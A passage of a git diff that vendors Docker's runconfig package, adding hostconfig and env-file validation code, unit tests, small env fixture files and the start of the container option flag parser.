+		c, err := DecodeHostConfig(bytes.NewReader(b))
+		if err != nil {
+			t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err))
+		}
+
+		if c.Privileged != false {
+			t.Fatalf("Expected privileged false, found %v\n", c.Privileged)
+		}
+
+		if l := len(c.Binds); l != 1 {
+			t.Fatalf("Expected 1 bind, found %d\n", l)
+		}
+
+		if len(c.CapAdd) != 1 && c.CapAdd[0] != "NET_ADMIN" {
+			t.Fatalf("Expected CapAdd NET_ADMIN, got %v", c.CapAdd)
+		}
+
+		if len(c.CapDrop) != 1 && c.CapDrop[0] != "NET_ADMIN" {
+			t.Fatalf("Expected CapDrop MKNOD, got %v", c.CapDrop)
+		}
+	}
+}
+
+func TestValidateResources(t *testing.T) {
+	type resourceTest struct {
+		ConfigCPURealtimePeriod   int64
+		ConfigCPURealtimeRuntime  int64
+		SysInfoCPURealtimePeriod  bool
+		SysInfoCPURealtimeRuntime bool
+		ErrorExpected             bool
+		FailureMsg                string
+	}
+
+	tests := []resourceTest{
+		{
+			ConfigCPURealtimePeriod:   1000,
+			ConfigCPURealtimeRuntime:  1000,
+			SysInfoCPURealtimePeriod:  true,
+			SysInfoCPURealtimeRuntime: true,
+			ErrorExpected:             false,
+			FailureMsg:                "Expected valid configuration",
+		},
+		{
+			ConfigCPURealtimePeriod:   5000,
+			ConfigCPURealtimeRuntime:  5000,
+			SysInfoCPURealtimePeriod:  false,
+			SysInfoCPURealtimeRuntime: true,
+			ErrorExpected:             true,
+			FailureMsg:                "Expected failure when cpu-rt-period is set but kernel doesn't support it",
+		},
+		{
+			ConfigCPURealtimePeriod:   5000,
+			ConfigCPURealtimeRuntime:  5000,
+			SysInfoCPURealtimePeriod:  true,
+			SysInfoCPURealtimeRuntime: false,
+			ErrorExpected:             true,
+			FailureMsg:                "Expected failure when cpu-rt-runtime is set but kernel doesn't support it",
+		},
+		{
+			ConfigCPURealtimePeriod:   5000,
+			ConfigCPURealtimeRuntime:  10000,
+			SysInfoCPURealtimePeriod:  true,
+			SysInfoCPURealtimeRuntime: false,
+			ErrorExpected:             true,
+			FailureMsg:                "Expected failure when cpu-rt-runtime is greater than cpu-rt-period",
+		},
+	}
+
+	for _, rt := range tests {
+		var hc container.HostConfig
+		hc.Resources.CPURealtimePeriod = rt.ConfigCPURealtimePeriod
+		hc.Resources.CPURealtimeRuntime = rt.ConfigCPURealtimeRuntime
+
+		var si sysinfo.SysInfo
+		si.CPURealtimePeriod = rt.SysInfoCPURealtimePeriod
+		si.CPURealtimeRuntime = rt.SysInfoCPURealtimeRuntime
+
+		if err := ValidateResources(&hc, &si); (err != nil) != rt.ErrorExpected {
+			t.Fatal(rt.FailureMsg, err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go
new file mode 100644
index 0000000000..6e2b7f5ff7
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go
@@ -0,0 +1,129 @@
+// +build !windows,!solaris
+
+package runconfig
+
+import (
+	"fmt"
+	"runtime"
+	"strings"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/pkg/sysinfo"
+)
+
+// DefaultDaemonNetworkMode returns the default network stack the daemon should
+// use.
+func DefaultDaemonNetworkMode() container.NetworkMode {
+	return container.NetworkMode("bridge")
+}
+
+// IsPreDefinedNetwork indicates if a network is predefined by the daemon
+func IsPreDefinedNetwork(network string) bool {
+	n := container.NetworkMode(network)
+	return n.IsBridge() || n.IsHost() || n.IsNone() || n.IsDefault() || network == "ingress"
+}
+
+// ValidateNetMode ensures that the various combinations of requested
+// network settings are valid.
+func ValidateNetMode(c *container.Config, hc *container.HostConfig) error {
+	// We may not be passed a host config, such as in the case of docker commit
+	if hc == nil {
+		return nil
+	}
+	parts := strings.Split(string(hc.NetworkMode), ":")
+	if parts[0] == "container" {
+		if len(parts) < 2 || parts[1] == "" {
+			return fmt.Errorf("--net: invalid net mode: invalid container format container:<name|id>")
+		}
+	}
+
+	if hc.NetworkMode.IsContainer() && c.Hostname != "" {
+		return ErrConflictNetworkHostname
+	}
+
+	if hc.UTSMode.IsHost() && c.Hostname != "" {
+		return ErrConflictUTSHostname
+	}
+
+	if hc.NetworkMode.IsHost() && len(hc.Links) > 0 {
+		return ErrConflictHostNetworkAndLinks
+	}
+
+	if hc.NetworkMode.IsContainer() && len(hc.Links) > 0 {
+		return ErrConflictContainerNetworkAndLinks
+	}
+
+	if hc.NetworkMode.IsContainer() && len(hc.DNS) > 0 {
+		return ErrConflictNetworkAndDNS
+	}
+
+	if hc.NetworkMode.IsContainer() && len(hc.ExtraHosts) > 0 {
+		return ErrConflictNetworkHosts
+	}
+
+	if (hc.NetworkMode.IsContainer() || hc.NetworkMode.IsHost()) && c.MacAddress != "" {
+		return ErrConflictContainerNetworkAndMac
+	}
+
+	if hc.NetworkMode.IsContainer() && (len(hc.PortBindings) > 0 || hc.PublishAllPorts == true) {
+		return ErrConflictNetworkPublishPorts
+	}
+
+	if hc.NetworkMode.IsContainer() && len(c.ExposedPorts) > 0 {
+		return ErrConflictNetworkExposePorts
+	}
+	return nil
+}
+
+// ValidateIsolation performs platform specific validation of
+// isolation in the hostconfig structure. Linux only supports "default"
+// which is LXC container isolation
+func ValidateIsolation(hc *container.HostConfig) error {
+	// We may not be passed a host config, such as in the case of docker commit
+	if hc == nil {
+		return nil
+	}
+	if !hc.Isolation.IsValid() {
+		return fmt.Errorf("invalid --isolation: %q - %s only supports 'default'", hc.Isolation, runtime.GOOS)
+	}
+	return nil
+}
+
+// ValidateQoS performs platform specific validation of the QoS settings
+func ValidateQoS(hc *container.HostConfig) error {
+	// We may not be passed a host config, such as in the case of docker commit
+	if hc == nil {
+		return nil
+	}
+
+	if hc.IOMaximumBandwidth != 0 {
+		return fmt.Errorf("invalid QoS settings: %s does not support --io-maxbandwidth", runtime.GOOS)
+	}
+
+	if hc.IOMaximumIOps != 0 {
+		return fmt.Errorf("invalid QoS settings: %s does not support --io-maxiops", runtime.GOOS)
+	}
+	return nil
+}
+
+// ValidateResources performs platform specific validation of the resource settings
+// cpu-rt-runtime and cpu-rt-period can not be greater than their parent, cpu-rt-runtime requires sys_nice
+func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error {
+	// We may not be passed a host config, such as in the case of docker commit
+	if hc == nil {
+		return nil
+	}
+
+	if hc.Resources.CPURealtimePeriod > 0 && !si.CPURealtimePeriod {
+		return fmt.Errorf("invalid --cpu-rt-period: Your kernel does not support cgroup rt period")
+	}
+
+	if hc.Resources.CPURealtimeRuntime > 0 && !si.CPURealtimeRuntime {
+		return fmt.Errorf("invalid --cpu-rt-runtime: Your kernel does not support cgroup rt runtime")
+	}
+
+	if hc.Resources.CPURealtimePeriod != 0 && hc.Resources.CPURealtimeRuntime != 0 && hc.Resources.CPURealtimeRuntime > hc.Resources.CPURealtimePeriod {
+		return fmt.Errorf("invalid --cpu-rt-runtime: rt runtime cannot be higher than rt period")
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go
new file mode 100644
index 0000000000..91bd6dcc3c
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go
@@ -0,0 +1,68 @@
+package runconfig
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/pkg/sysinfo"
+)
+
+// DefaultDaemonNetworkMode returns the default network stack the daemon should
+// use.
+func DefaultDaemonNetworkMode() container.NetworkMode {
+	return container.NetworkMode("nat")
+}
+
+// IsPreDefinedNetwork indicates if a network is predefined by the daemon
+func IsPreDefinedNetwork(network string) bool {
+	return !container.NetworkMode(network).IsUserDefined()
+}
+
+// ValidateNetMode ensures that the various combinations of requested
+// network settings are valid.
+func ValidateNetMode(c *container.Config, hc *container.HostConfig) error {
+	if hc == nil {
+		return nil
+	}
+	parts := strings.Split(string(hc.NetworkMode), ":")
+	if len(parts) > 1 {
+		return fmt.Errorf("invalid --net: %s", hc.NetworkMode)
+	}
+	return nil
+}
+
+// ValidateIsolation performs platform specific validation of the
+// isolation in the hostconfig structure. Windows supports 'default' (or
+// blank), 'process', or 'hyperv'.
+func ValidateIsolation(hc *container.HostConfig) error {
+	// We may not be passed a host config, such as in the case of docker commit
+	if hc == nil {
+		return nil
+	}
+	if !hc.Isolation.IsValid() {
+		return fmt.Errorf("invalid --isolation: %q. Windows supports 'default', 'process', or 'hyperv'", hc.Isolation)
+	}
+	return nil
+}
+
+// ValidateQoS performs platform specific validation of the Qos settings
+func ValidateQoS(hc *container.HostConfig) error {
+	return nil
+}
+
+// ValidateResources performs platform specific validation of the resource settings
+func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error {
+	// We may not be passed a host config, such as in the case of docker commit
+	if hc == nil {
+		return nil
+	}
+
+	if hc.Resources.CPURealtimePeriod != 0 {
+		return fmt.Errorf("invalid --cpu-rt-period: Windows does not support this feature")
+	}
+	if hc.Resources.CPURealtimeRuntime != 0 {
+		return fmt.Errorf("invalid --cpu-rt-runtime: Windows does not support this feature")
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile.go b/vendor/github.com/docker/docker/runconfig/opts/envfile.go
new file mode 100644
index 0000000000..f723799215
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/envfile.go
@@ -0,0 +1,81 @@
+package opts
+
+import (
+	"bufio"
+	"bytes"
+	"fmt"
+	"os"
+	"strings"
+	"unicode"
+	"unicode/utf8"
+)
+
+// ParseEnvFile reads a file with environment variables enumerated by lines
+//
+// ``Environment variable names used by the utilities in the Shell and
+// Utilities volume of IEEE Std 1003.1-2001 consist solely of uppercase
+// letters, digits, and the '_' (underscore) from the characters defined in
+// Portable Character Set and do not begin with a digit. *But*, other
+// characters may be permitted by an implementation; applications shall
+// tolerate the presence of such names.''
+// -- http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap08.html
+//
+// As of #16585, it's up to application inside docker to validate or not
+// environment variables, that's why we just strip leading whitespace and
+// nothing more.
+func ParseEnvFile(filename string) ([]string, error) {
+	fh, err := os.Open(filename)
+	if err != nil {
+		return []string{}, err
+	}
+	defer fh.Close()
+
+	lines := []string{}
+	scanner := bufio.NewScanner(fh)
+	currentLine := 0
+	utf8bom := []byte{0xEF, 0xBB, 0xBF}
+	for scanner.Scan() {
+		scannedBytes := scanner.Bytes()
+		if !utf8.Valid(scannedBytes) {
+			return []string{}, fmt.Errorf("env file %s contains invalid utf8 bytes at line %d: %v", filename, currentLine+1, scannedBytes)
+		}
+		// We trim UTF8 BOM
+		if currentLine == 0 {
+			scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom)
+		}
+		// trim the line from all leading whitespace first
+		line := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace)
+		currentLine++
+		// line is not empty, and not starting with '#'
+		if len(line) > 0 && !strings.HasPrefix(line, "#") {
+			data := strings.SplitN(line, "=", 2)
+
+			// trim the front of a variable, but nothing else
+			variable := strings.TrimLeft(data[0], whiteSpaces)
+			if strings.ContainsAny(variable, whiteSpaces) {
+				return []string{}, ErrBadEnvVariable{fmt.Sprintf("variable '%s' has white spaces", variable)}
+			}
+
+			if len(data) > 1 {
+
+				// pass the value through, no trimming
+				lines = append(lines, fmt.Sprintf("%s=%s", variable, data[1]))
+			} else {
+				// if only a pass-through variable is given, clean it up.
+				lines = append(lines, fmt.Sprintf("%s=%s", strings.TrimSpace(line), os.Getenv(line)))
+			}
+		}
+	}
+	return lines, scanner.Err()
+}
+
+var whiteSpaces = " \t"
+
+// ErrBadEnvVariable typed error for bad environment variable
+type ErrBadEnvVariable struct {
+	msg string
+}
+
+func (e ErrBadEnvVariable) Error() string {
+	return fmt.Sprintf("poorly formatted environment: %s", e.msg)
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go b/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go
new file mode 100644
index 0000000000..5dd7078bc0
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go
@@ -0,0 +1,142 @@
+package opts
+
+import (
+	"bufio"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"reflect"
+	"strings"
+	"testing"
+)
+
+func tmpFileWithContent(content string, t *testing.T) string {
+	tmpFile, err := ioutil.TempFile("", "envfile-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer tmpFile.Close()
+
+	tmpFile.WriteString(content)
+	return tmpFile.Name()
+}
+
+// Test ParseEnvFile for a file with a few well formatted lines
+func TestParseEnvFileGoodFile(t *testing.T) {
+	content := `foo=bar
+    baz=quux
+# comment
+
+_foobar=foobaz
+with.dots=working
+and_underscore=working too
+`
+	// Adding a newline + a line with pure whitespace.
+	// This is being done like this instead of the block above
+	// because it's common for editors to trim trailing whitespace
+	// from lines, which becomes annoying since that's the
+	// exact thing we need to test.
+	content += "\n    \t  "
+	tmpFile := tmpFileWithContent(content, t)
+	defer os.Remove(tmpFile)
+
+	lines, err := ParseEnvFile(tmpFile)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expectedLines := []string{
+		"foo=bar",
+		"baz=quux",
+		"_foobar=foobaz",
+		"with.dots=working",
+		"and_underscore=working too",
+	}
+
+	if !reflect.DeepEqual(lines, expectedLines) {
+		t.Fatal("lines not equal to expected_lines")
+	}
+}
+
+// Test ParseEnvFile for an empty file
+func TestParseEnvFileEmptyFile(t *testing.T) {
+	tmpFile := tmpFileWithContent("", t)
+	defer os.Remove(tmpFile)
+
+	lines, err := ParseEnvFile(tmpFile)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(lines) != 0 {
+		t.Fatal("lines not empty; expected empty")
+	}
+}
+
+// Test ParseEnvFile for a non existent file
+func TestParseEnvFileNonExistentFile(t *testing.T) {
+	_, err := ParseEnvFile("foo_bar_baz")
+	if err == nil {
+		t.Fatal("ParseEnvFile succeeded; expected failure")
+	}
+	if _, ok := err.(*os.PathError); !ok {
+		t.Fatalf("Expected a PathError, got [%v]", err)
+	}
+}
+
+// Test ParseEnvFile for a badly formatted file
+func TestParseEnvFileBadlyFormattedFile(t *testing.T) {
+	content := `foo=bar
+    f   =quux
+`
+
+	tmpFile := tmpFileWithContent(content, t)
+	defer os.Remove(tmpFile)
+
+	_, err := ParseEnvFile(tmpFile)
+	if err == nil {
+		t.Fatalf("Expected an ErrBadEnvVariable, got nothing")
+	}
+	if _, ok := err.(ErrBadEnvVariable); !ok {
+		t.Fatalf("Expected an ErrBadEnvVariable, got [%v]", err)
+	}
+	expectedMessage := "poorly formatted environment: variable 'f   ' has white spaces"
+	if err.Error() != expectedMessage {
+		t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error())
+	}
+}
+
+// Test ParseEnvFile for a file with a line exceeding bufio.MaxScanTokenSize
+func TestParseEnvFileLineTooLongFile(t *testing.T) {
+	content := strings.Repeat("a", bufio.MaxScanTokenSize+42)
+	content = fmt.Sprint("foo=", content)
+
+	tmpFile := tmpFileWithContent(content, t)
+	defer os.Remove(tmpFile)
+
+	_, err := ParseEnvFile(tmpFile)
+	if err == nil {
+		t.Fatal("ParseEnvFile succeeded; expected failure")
+	}
+}
+
+// ParseEnvFile with a random file, pass through
+func TestParseEnvFileRandomFile(t *testing.T) {
+	content := `first line
+another invalid line`
+	tmpFile := tmpFileWithContent(content, t)
+	defer os.Remove(tmpFile)
+
+	_, err := ParseEnvFile(tmpFile)
+
+	if err == nil {
+		t.Fatalf("Expected an ErrBadEnvVariable, got nothing")
+	}
+	if _, ok := err.(ErrBadEnvVariable); !ok {
+		t.Fatalf("Expected an ErrBadEnvvariable, got [%v]", err)
+	}
+	expectedMessage := "poorly formatted environment: variable 'first line' has white spaces"
+	if err.Error() != expectedMessage {
+		t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error())
+	}
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env
new file mode 100755
index 0000000000000000000000000000000000000000..3a73358fffbc0d5d3d4df985ccf2f4a1a29cdb2a
GIT binary patch
literal 54
ucmezW&yB$!2yGdh7#tab7<d`D7(5tU8GL{cB)TG@HWDNTk+o%js0IKq+6kus

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16be.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16be.env
new file mode 100755
index 0000000000000000000000000000000000000000..e523da7af4dab0636ed73fabf730f33a1cb915b4
GIT binary patch
literal 54
ucmezOpTUj69|&z3oERJ#f*5!ixEMSbTp4_T5Gb0kBC-}N29dRes0IKkq6wz}

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env
new file mode 100755
index 0000000000..1ce45055b7
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env
@@ -0,0 +1,3 @@
+FOO=BAR
+HELLO=您好
+BAR=FOO
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env
new file mode 100644
index 0000000000..3afbdc81c2
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env
@@ -0,0 +1 @@
+ENV1=value1
diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label b/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label
new file mode 100644
index 0000000000..b4208bdf8f
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label
@@ -0,0 +1 @@
+LABEL1=value1
diff --git a/vendor/github.com/docker/docker/runconfig/opts/opts.go b/vendor/github.com/docker/docker/runconfig/opts/opts.go
new file mode 100644
index 0000000000..cae0432f05
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/opts.go
@@ -0,0 +1,83 @@
+package opts
+
+import (
+	"fmt"
+	"net"
+	"os"
+	"runtime"
+	"strings"
+
+	fopts "github.com/docker/docker/opts"
+)
+
+// ValidateAttach validates that the specified string is a valid attach option.
+func ValidateAttach(val string) (string, error) {
+	s := strings.ToLower(val)
+	for _, str := range []string{"stdin", "stdout", "stderr"} {
+		if s == str {
+			return s, nil
+		}
+	}
+	return val, fmt.Errorf("valid streams are STDIN, STDOUT and STDERR")
+}
+
+// ValidateEnv validates an environment variable and returns it.
+// If no value is specified, it returns the current value using os.Getenv.
+//
+// As on ParseEnvFile and related to #16585, environment variable names
+// are not validate what so ever, it's up to application inside docker
+// to validate them or not.
+//
+// The only validation here is to check if name is empty, per #25099
+func ValidateEnv(val string) (string, error) {
+	arr := strings.Split(val, "=")
+	if arr[0] == "" {
+		return "", fmt.Errorf("invalid environment variable: %s", val)
+	}
+	if len(arr) > 1 {
+		return val, nil
+	}
+	if !doesEnvExist(val) {
+		return val, nil
+	}
+	return fmt.Sprintf("%s=%s", val, os.Getenv(val)), nil
+}
+
+func doesEnvExist(name string) bool {
+	for _, entry := range os.Environ() {
+		parts := strings.SplitN(entry, "=", 2)
+		if runtime.GOOS == "windows" {
+			// Environment variable are case-insensitive on Windows. PaTh, path and PATH are equivalent.
+			if strings.EqualFold(parts[0], name) {
+				return true
+			}
+		}
+		if parts[0] == name {
+			return true
+		}
+	}
+	return false
+}
+
+// ValidateExtraHost validates that the specified string is a valid extrahost and returns it.
+// ExtraHost is in the form of name:ip where the ip has to be a valid ip (IPv4 or IPv6).
+func ValidateExtraHost(val string) (string, error) {
+	// allow for IPv6 addresses in extra hosts by only splitting on first ":"
+	arr := strings.SplitN(val, ":", 2)
+	if len(arr) != 2 || len(arr[0]) == 0 {
+		return "", fmt.Errorf("bad format for add-host: %q", val)
+	}
+	if _, err := fopts.ValidateIPAddress(arr[1]); err != nil {
+		return "", fmt.Errorf("invalid IP address in add-host: %q", arr[1])
+	}
+	return val, nil
+}
+
+// ValidateMACAddress validates a MAC address.
+func ValidateMACAddress(val string) (string, error) {
+	_, err := net.ParseMAC(strings.TrimSpace(val))
+	if err != nil {
+		return "", err
+	}
+	return val, nil
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/opts_test.go b/vendor/github.com/docker/docker/runconfig/opts/opts_test.go
new file mode 100644
index 0000000000..43f8730fc4
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/opts_test.go
@@ -0,0 +1,113 @@
+package opts
+
+import (
+	"fmt"
+	"os"
+	"runtime"
+	"strings"
+	"testing"
+)
+
+func TestValidateAttach(t *testing.T) {
+	valid := []string{
+		"stdin",
+		"stdout",
+		"stderr",
+		"STDIN",
+		"STDOUT",
+		"STDERR",
+	}
+	if _, err := ValidateAttach("invalid"); err == nil {
+		t.Fatalf("Expected error with [valid streams are STDIN, STDOUT and STDERR], got nothing")
+	}
+
+	for _, attach := range valid {
+		value, err := ValidateAttach(attach)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if value != strings.ToLower(attach) {
+			t.Fatalf("Expected [%v], got [%v]", attach, value)
+		}
+	}
+}
+
+func TestValidateEnv(t *testing.T) {
+	valids := map[string]string{
+		"a":                   "a",
+		"something":           "something",
+		"_=a":                 "_=a",
+		"env1=value1":         "env1=value1",
+		"_env1=value1":        "_env1=value1",
+		"env2=value2=value3":  "env2=value2=value3",
+		"env3=abc!qwe":        "env3=abc!qwe",
+		"env_4=value 4":       "env_4=value 4",
+		"PATH":                fmt.Sprintf("PATH=%v", os.Getenv("PATH")),
+		"PATH=something":      "PATH=something",
+		"asd!qwe":             "asd!qwe",
+		"1asd":                "1asd",
+		"123":                 "123",
+		"some space":          "some space",
+		"  some space before": "  some space before",
+		"some space after  ":  "some space after  ",
+	}
+	// Environment variables are case in-sensitive on Windows
+	if runtime.GOOS == "windows" {
+		valids["PaTh"] = fmt.Sprintf("PaTh=%v", os.Getenv("PATH"))
+	}
+	for value, expected := range valids {
+		actual, err := ValidateEnv(value)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if actual != expected {
+			t.Fatalf("Expected [%v], got [%v]", expected, actual)
+		}
+	}
+}
+
+func TestValidateExtraHosts(t *testing.T) {
+	valid := []string{
+		`myhost:192.168.0.1`,
+		`thathost:10.0.2.1`,
+		`anipv6host:2003:ab34:e::1`,
+		`ipv6local:::1`,
+	}
+
+	invalid := map[string]string{
+		`myhost:192.notanipaddress.1`:  `invalid IP`,
+		`thathost-nosemicolon10.0.0.1`: `bad format`,
+		`anipv6host:::::1`:             `invalid IP`,
+		`ipv6local:::0::`:              `invalid IP`,
+	}
+
+	for _, extrahost := range valid {
+		if _, err := ValidateExtraHost(extrahost); err != nil {
+			t.Fatalf("ValidateExtraHost(`"+extrahost+"`) should succeed: error %v", err)
+		}
+	}
+
+	for extraHost, expectedError := range invalid {
+		if _, err := ValidateExtraHost(extraHost); err == nil {
+			t.Fatalf("ValidateExtraHost(`%q`) should have failed validation", extraHost)
+		} else {
+			if !strings.Contains(err.Error(), expectedError) {
+				t.Fatalf("ValidateExtraHost(`%q`) error should contain %q", extraHost, expectedError)
+			}
+		}
+	}
+}
+
+func TestValidateMACAddress(t *testing.T) {
+	if _, err := ValidateMACAddress(`92:d0:c6:0a:29:33`); err != nil {
+		t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:29:33`) got %s", err)
+	}
+
+	if _, err := ValidateMACAddress(`92:d0:c6:0a:33`); err == nil {
+		t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:33`) succeeded; expected failure on invalid MAC")
+	}
+
+	if _, err := ValidateMACAddress(`random invalid string`); err == nil {
+		t.Fatalf("ValidateMACAddress(`random invalid string`) succeeded; expected failure on invalid MAC")
+	}
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse.go b/vendor/github.com/docker/docker/runconfig/opts/parse.go
new file mode 100644
index 0000000000..71a89277ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/parse.go
@@ -0,0 +1,995 @@
+package opts
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"path"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+	networktypes "github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/signal"
+	"github.com/docker/go-connections/nat"
+	units "github.com/docker/go-units"
+	"github.com/spf13/pflag"
+)
+
+// ContainerOptions is a data object with all the options for creating a container
+type ContainerOptions struct {
+	attach             opts.ListOpts
+	volumes            opts.ListOpts
+	tmpfs              opts.ListOpts
+	blkioWeightDevice  WeightdeviceOpt
+	deviceReadBps      ThrottledeviceOpt
+	deviceWriteBps     ThrottledeviceOpt
+	links              opts.ListOpts
+	aliases            opts.ListOpts
+	linkLocalIPs       opts.ListOpts
+	deviceReadIOps     ThrottledeviceOpt
+	deviceWriteIOps    ThrottledeviceOpt
+	env                opts.ListOpts
+	labels             opts.ListOpts
+	devices            opts.ListOpts
+	ulimits            *UlimitOpt
+	sysctls            *opts.MapOpts
+	publish            opts.ListOpts
+	expose             opts.ListOpts
+	dns                opts.ListOpts
+	dnsSearch          opts.ListOpts
+	dnsOptions         opts.ListOpts
+	extraHosts         opts.ListOpts
+	volumesFrom        opts.ListOpts
+	envFile            opts.ListOpts
+	capAdd             opts.ListOpts
+	capDrop            opts.ListOpts
+	groupAdd           opts.ListOpts
+	securityOpt        opts.ListOpts
+	storageOpt         opts.ListOpts
+	labelsFile         opts.ListOpts
+	loggingOpts        opts.ListOpts
+	privileged         bool
+	pidMode            string
+	utsMode            string
+	usernsMode         string
+	publishAll         bool
+	stdin              bool
+	tty                bool
+	oomKillDisable     bool
+	oomScoreAdj        int
+	containerIDFile    string
+	entrypoint         string
+	hostname           string
+	memoryString       string
+	memoryReservation  string
+	memorySwap         string
+	kernelMemory       string
+	user               string
+	workingDir         string
+	cpuCount           int64
+	cpuShares          int64
+	cpuPercent         int64
+	cpuPeriod          int64
+	cpuRealtimePeriod  int64
+	cpuRealtimeRuntime int64
+	cpuQuota           int64
+	cpus               opts.NanoCPUs
+	cpusetCpus         string
+	cpusetMems         string
+	blkioWeight        uint16
+	ioMaxBandwidth     string
+	ioMaxIOps          uint64
+	swappiness         int64
+	netMode            string
+	macAddress         string
+	ipv4Address        string
+	ipv6Address        string
+	ipcMode            string
+	pidsLimit          int64
+	restartPolicy      string
+	readonlyRootfs     bool
+	loggingDriver      string
+	cgroupParent       string
+	volumeDriver       string
+	stopSignal         string
+	stopTimeout        int
+	isolation          string
+	shmSize            string
+	noHealthcheck      bool
+	healthCmd          string
+	healthInterval     time.Duration
+	healthTimeout      time.Duration
+	healthRetries      int
+	runtime            string
+	autoRemove         bool
+	init               bool
+	initPath           string
+	credentialSpec     string
+
+	Image string
+	Args  []string
+}
+
+// AddFlags adds all command line flags that will be used by Parse to the FlagSet
+func AddFlags(flags *pflag.FlagSet) *ContainerOptions {
+	copts := &ContainerOptions{
+		aliases:           opts.NewListOpts(nil),
+		attach:            opts.NewListOpts(ValidateAttach),
+		blkioWeightDevice: NewWeightdeviceOpt(ValidateWeightDevice),
+		capAdd:            opts.NewListOpts(nil),
+		capDrop:           opts.NewListOpts(nil),
+		dns:               opts.NewListOpts(opts.ValidateIPAddress),
+		dnsOptions:        opts.NewListOpts(nil),
+		dnsSearch:         opts.NewListOpts(opts.ValidateDNSSearch),
+		deviceReadBps:     NewThrottledeviceOpt(ValidateThrottleBpsDevice),
+		deviceReadIOps:    NewThrottledeviceOpt(ValidateThrottleIOpsDevice),
+		deviceWriteBps:    NewThrottledeviceOpt(ValidateThrottleBpsDevice),
+		deviceWriteIOps:   NewThrottledeviceOpt(ValidateThrottleIOpsDevice),
+		devices:           opts.NewListOpts(ValidateDevice),
+		env:               opts.NewListOpts(ValidateEnv),
+		envFile:           opts.NewListOpts(nil),
+		expose:            opts.NewListOpts(nil),
+		extraHosts:        opts.NewListOpts(ValidateExtraHost),
+		groupAdd:          opts.NewListOpts(nil),
+		labels:            opts.NewListOpts(ValidateEnv),
+		labelsFile:        opts.NewListOpts(nil),
+		linkLocalIPs:      opts.NewListOpts(nil),
+		links:             opts.NewListOpts(ValidateLink),
+		loggingOpts:       opts.NewListOpts(nil),
+		publish:           opts.NewListOpts(nil),
+		securityOpt:       opts.NewListOpts(nil),
+		storageOpt:        opts.NewListOpts(nil),
+		sysctls:           opts.NewMapOpts(nil, opts.ValidateSysctl),
+		tmpfs:             opts.NewListOpts(nil),
+		ulimits:           NewUlimitOpt(nil),
+		volumes:           opts.NewListOpts(nil),
+		volumesFrom:       opts.NewListOpts(nil),
+	}
+
+	// General purpose flags
+	flags.VarP(&copts.attach, "attach", "a", "Attach to STDIN, STDOUT or STDERR")
+	flags.Var(&copts.devices, "device", "Add a host device to the container")
+	flags.VarP(&copts.env, "env", "e", "Set environment variables")
+	flags.Var(&copts.envFile, "env-file", "Read in a file of environment variables")
+	flags.StringVar(&copts.entrypoint, "entrypoint", "", "Overwrite the default ENTRYPOINT of the image")
+	flags.Var(&copts.groupAdd, "group-add", "Add additional groups to join")
+	flags.StringVarP(&copts.hostname, "hostname", "h", "", "Container host name")
+	flags.BoolVarP(&copts.stdin, "interactive", "i", false, "Keep STDIN open even if not attached")
+	flags.VarP(&copts.labels, "label", "l", "Set meta data on a container")
+	flags.Var(&copts.labelsFile, "label-file", "Read in a line delimited file of labels")
